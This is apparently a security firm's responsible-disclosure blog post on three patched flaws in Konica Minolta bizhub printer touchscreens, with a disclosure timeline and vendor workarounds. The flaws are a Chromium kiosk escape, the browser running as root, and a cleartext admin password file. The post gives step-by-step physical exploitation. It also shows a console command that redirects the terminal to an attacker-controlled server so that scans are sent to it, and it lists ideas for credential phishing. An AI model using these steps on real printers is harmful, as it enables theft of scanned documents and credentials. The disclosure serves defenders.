Someone call the patch manager

How COVID-19 left hundreds of thousands of printers vulnerable

The SEC Consult Vulnerability Lab identified a sandbox breakout vulnerability in multiple Konica Minolta bizhub MFP printers end of 2019, that could be exploited via physical access to a printer's touchscreen terminal. An attacker is able to get full read and write access to the printer's operating system and stored data as root. This can be used to manipulate and compromise the printer and its users in many ways. Konica Minolta reacted in an exemplary manner and fixed the vulnerabilities immediately at the beginning of 2020. They also kept the updates coming continuously during our responsible disclosure. Due to the large number of affected devices  (hundreds of thousands of devices according to the vendor) and the need to apply the firmware update manually by service technicians, the process took quite some time, especially during the COVID-19 pandemic with multiple lockdowns hindering the technicians to go on-site. 

This blog post describes the vulnerabilities and patches, a practical example of the attack as well as a word about the responsible disclosure timeline. Furthermore, a technical security advisory has been published as well containing the affected models and fixed firmware versions. 

A Different Approach to Printer Pentesting 

The classic way 

For years a large amount of printer vulnerabilities has been published regularly. Most of those vulnerabilities are found in one of the following parts of the printer: 

  • The networking features and protocols exposed by the printers  

  • Printer Services 

  • Printer Software and Drivers 

  • (Web) Applications running on the printers themselves 

Very good research concerning classic printer vulnerabilities can be found at the following locations: 

https://www.blackhat.com/presentations/bh-asia-02/bh-asia-02-fx.pdf 

https://www.nds.ruhr-uni-bochum.de/media/ei/arbeiten/2017/01/30/exploiting-printers.pdf 

https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/august/the-cyber-risk-lurking-in-your-office-corner/ 

https://gsec.hitb.org/sg2019/sessions/why-you-should-fear-your-mundane-office-equipment/ → Very nice talk - we have been there personally  

http://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Diving-Into-Spooler-Discovering-Lpe-And-Rce-Vulnerabilities-In-Windows-Printer.pdf → PrintNightmare vulnerabilities 

A different route 

We tried to go a different route and focused on "the printer" itself. In the end it is just another computer with a housing fit to fulfill its purpose - in this case putting ink on paper. On most modern office printers you can find one or multiple of the following elements: 

  • A screen, or even a touchscreen 

  • Multiple inputs like keyboards, trackballs, touchscreens 

  • Multiple ports like USB, RJ-45, serial interfaces, etc. 

  • RFID readers for authentication 

Most printers also have in common that they use their display to show some kind of application running in full screen on top of a Unixoid operating system that is, or should be locked down completely. This part is what we refer from now on as the printer sandbox. All scenarios that we tested were done as an unauthenticated user with physical access to the printer's touchscreen.  

We observed that by opening certain applications and/or settings via the terminal, it was possible to observe a slight change in the look and feel of the user interface itself. It was quickly determined that this was the result of context change, meaning that the applications running are not solely based on the proprietary application only. After attaching a keyboard to one of the multiple USB ports of the printer and pressing specific key combinations, it was possible to determine that some application parts are running an ordinary Chromium browser in "kiosk mode", which can be escaped easily. This allows an attacker to get full access to the underlying printer's operating- and file system, including configuration files, passwords in clear text, proprietary scripts and many more. Access to all those files was easily possible as chrome was running as root.  

Figure: Konica Minolta bizhub C3300i with touchscreen terminal

The Test Subject 

The test subjects were Konica Minolta bizhub C3300i and C3350i printer devices - or more precisely their terminal. 

To get a small overview, the following picture shows the printer including the terminal. 

Proof-of-Concept 

SEC Consult identified three distinct security issues on the printer terminals. 

  1. Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586)
  2. Terminal UI/Chromium running as root (CVE-2022-29587)
  3. Passwords stored in clear text on the file system (CVE-2022-29588)

 

Those issues are described in detail in the following paragraphs.

Vulnerability No. 1 - Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586) 

A touch screen terminal is attached to the printer in order to manage print jobs, create new scans, simply copy a page or to configure the device. The touch screen terminal hosts a user interface, which is based upon a proprietary application. By opening certain applications and/or settings via the terminal, it was possible to observe a slight change in the look and feel of the user interface itself. It was quickly determined that this was the result of context change, meaning that the applications running are not solely based on the proprietary application only. After attaching a keyboard to one of the multiple USB ports of the printer and pressing specific key combinations, it was possible to determine that some application parts are running an ordinary Chromium browser in "kiosk mode", which can be escaped easily, although most of the key combinations were blacklisted. This allows an attacker to get full access to the underlying printer's operating- and file system, including configuration files, passwords in clear text, proprietary scripts and many more. 

Figure: Public User Access button

Step 1 – Public User Access 

Physical access is required to exploit this vulnerability. "User Authentication" must be used, and "Public User Access" must be enabled on the device.  The "Public User Access" button needs to be pressed on the physical printer touch screen terminal. 

Figure: Press "Utility" button

Step 2 – Utility 

After clicking the public user access button, a menu opens up where one can select specific functions, like "Scan" or "Copy". The "Utility" button must be pressed in the next step of the exploit chain, as can be seen in the following figure: 

Figure: Utility function

Step 3 – Utility again 

There are several choices in the appearing menu where the "Utility" button must be pressed again, as shown in the following figure: 

Figure: Chromium in kiosk mode

Step 4 – Accessing Chromium 

A slight change in the design of the user interface can be observed after clicking on the "Utility" button marked red in the step above. The reason for that is that the application, which is now visible, is launched inside of a Chromium browser in kiosk mode. The loaded web application in Chromium can be seen in the following figure. 

Figure: Chromium developer console access

Step 5 – Attaching a keyboard 

An external keyboard was attached to the USB port since the onscreen keyboard does not provide any function keys like "CTRL", "ALT", "F1-F12". All affected printers provide USB ports.  

Step 6 – Access Chromium Developer Console 

Most of the shortcuts available are blocked on a normal Linux operating system or crash the printer terminal, but we were still able to get full access to the system by pressing the key F12, which opened up the Chromium developer console. This can be seen in the following figure. 

The tab "Sources" can then be used to access the file system. Now a folder can be added by clicking "Add folder to workspace". A window appears at the top edge when adding a folder (we added "/var/log/nginx/html/") which asks for approval adding this folder. Access to the selected folder is possible for an attacker after clicking the button "Allow". 

From now on an attacker is able to: 

  • Read arbitrary files on the file system with root access 
  • Write arbitrary files, e.g. manipulate scripts of the web application (if they are not located on the read-only file system, which applies to some folders) 
Figure: ADMINPASS file containing the clear-text password displayed on the printer's touch screen.

Vulnerability No. 2 - Passwords stored in clear-text on the file system (CVE-2022-29588) 

As an example, an attacker can now access the directory "/var/log/nginx/html". This folder contains a file called ADMINPASS, which doesn't look suspicious at all - right? This file contains the administrator password for the printer terminal and web interface in plain text. 

Figure: Access to /etc/shadow file

Vulnerability No. 3 - Terminal UI/Chromium running as root (CVE-2022-29587) 

We also observed that we were able to access files such as /etc/shadow as can be seen in the following figure. 

This might indicate one of the following cases: 

  • A wrong set of permissions for files with sensitive data 
  • Or the chromium browser is running as root 

Konica Minolta confirmed that the latter one is the case, and the browser session gives an attacker root access to the printer device. 

It must also be noted that the passwords are stored using crypt in the /etc/shadow file, which was also not best practice back in 2019/2020. 

Figure: Printer UI function

A practical example of an attack, or how to steal user data 

The possibilities are basically endless if an attacker gets full access as root to the printer's operating system. We tried to come up with some interesting ideas: 

  • Presenting a login screen to steal (domain) credentials 
  • Phish printed files and send them to an attacker-controlled SMB share 
  • Phish scans and send them to an attacker-controlled web server 

The latter example is documented in detail in the following paragraph. 

We are going to show now how easy it is to manipulate the user interface of the terminal in a way that it is easily possible to trick a regular user to scan documents and automatically forward them to an attacker-controlled server. 

The sandbox escape was exploited, and the location of the website was set to an attacker-controlled server via the following command executed in the Chromium developer console. 

document.location=https://10.0.0.1:8888 

The whole screen of the printer terminal is now displaying the attacker-controlled website, containing a file upload, which is automatically triggered upon loading. A printer UI function is triggered instead of a regular Unix file open dialog on the operating system due to a special override of the printer. The printer UI function can be seen in the following figure. 

Figure: Successfully phished the scanned document on an attacker-controlled web server

If a user selects the scan feature, the document inside of the scanner is scanned and uploaded to the server hosted by the attacker. The successful upload of the file can be seen in the following figure. 

Affected Brands, Devices and Resellers 

According to the vendor, 46 Konica Minolta bizhub MFP models are affected. The number of affected machines in the field is in the hundreds of thousands of devices worldwide according to Konica Minolta. These devices are also rebranded and sold by other companies (OEM) which are affected as well. 

Workarounds, Countermeasures and Patches 

Johannes Kruchem and Werner Schober of the SEC Consult Vulnerability Lab (now an Atos company) identified the vulnerability end of 2019 and informed the Konica Minolta PSIRT adhering to our responsible disclosure process. Konica Minolta provided a patch of the firmware and operating system very quickly at the start of the year 2020. This firmware update must be manually applied for most devices by service technicians on-site as a remote service platform for remote firmware updates is not fully rolled out yet. Multiple COVID-19 lockdowns delayed this patching process of the large number of devices drastically, hence our security advisory could only be released now in 2022 after all devices had been patched. 

The following hardening/workaround information is available as well provided directly from Konica Minolta. 

Disable the use of the external USB keyboard by "Customer Administrator" setting 
In addition, it is strongly recommended to change the Customer Admin password to a new one. 

Hearing to our Sales Companies, most of customers do not need to use the external keyboard. 
Therefore, this workaround is effective to such customers until updating the FW. 

Our security advisory contains the full list of affected devices and firmware versions.

A Word about the Timeline 

In a typical responsible disclosure process the time between initial contact and release of the advisory is somewhere in the order of 50 days. Exceptions do of course apply. In this case the whole responsible disclosure process between first contact with Konica Minolta and the final release of the advisory is much higher. Nearly three years passed between initial discovery, first contact and the final release of the advisory. The reasons for that are very interesting and diverse, that's why we want to talk about them here. 

Reason 1 - COVID-19 Pandemic 

Believe it or not, but the main reason why this responsible disclosure process took so long was the ongoing COVID-19 pandemic. Most vulnerable printers world-wide had to be patched manually. In combination with the fact that a Konica Minolta service technician must be physically present to patch most of the devices and many lock downs hindering this procedure, the process took a very long time and was stretched out with every lock down in various countries. Furthermore, many companies switched to 100% home office, which made it partially impossible for service technicians to patch the devices in short term on the customer's premises. 

Reason 2 - Missing Central Patch Management 

Konica Minolta had to visit most customers and patch most of the affected devices manually as their remote service platform for remote firmware updates is not fully rolled out yet. This manual procedure takes a lot of time. A central patch management solution (either locally at the customer's premises, or externally available) would make the patch management process way more efficient and cost-effective. 

Nevertheless, the Konica Minolta PSIRT handled the case in a very professional way, provided an encrypted communications channel and delivered continuous updates and detailed information about the progress. The patched firmware itself was also developed and available in a very short amount of time after initial contact. This is not the standard case, thank you for the good cooperation! 

Bottom line 

The identification of those critical vulnerabilities and the deficiencies in the remote patching process or firmware update architecture show that vendors have to proactively invest in secure software design at the beginning of the development life cycle. Subsequent fixing of security issues can lead to significant patch management costs for vendors or customers. This is true especially in this case when patches can't be automatically deployed for most devices and have to be manually applied by specialists on-site. Customers on the other hand will be left unprotected for a long period of time because of a flawed design principle. 

SEC Consult supports vendors during the whole secure software development life cycle or for identification of security vulnerabilities during penetration tests or IT infrastructure assessments. Additionally, our experts support implementing an information security management system in order to reduce future (patch) costs. 

 

 

These vulnerabilities were identified by Johannes Kruchem and Werner Schober and published on behalf of the SEC Consult Vulnerability Lab. 

SEC Consult is always searching for talented security professionals to work in our team. More information can be found at: https://www.sec-consult.com/career

 

Back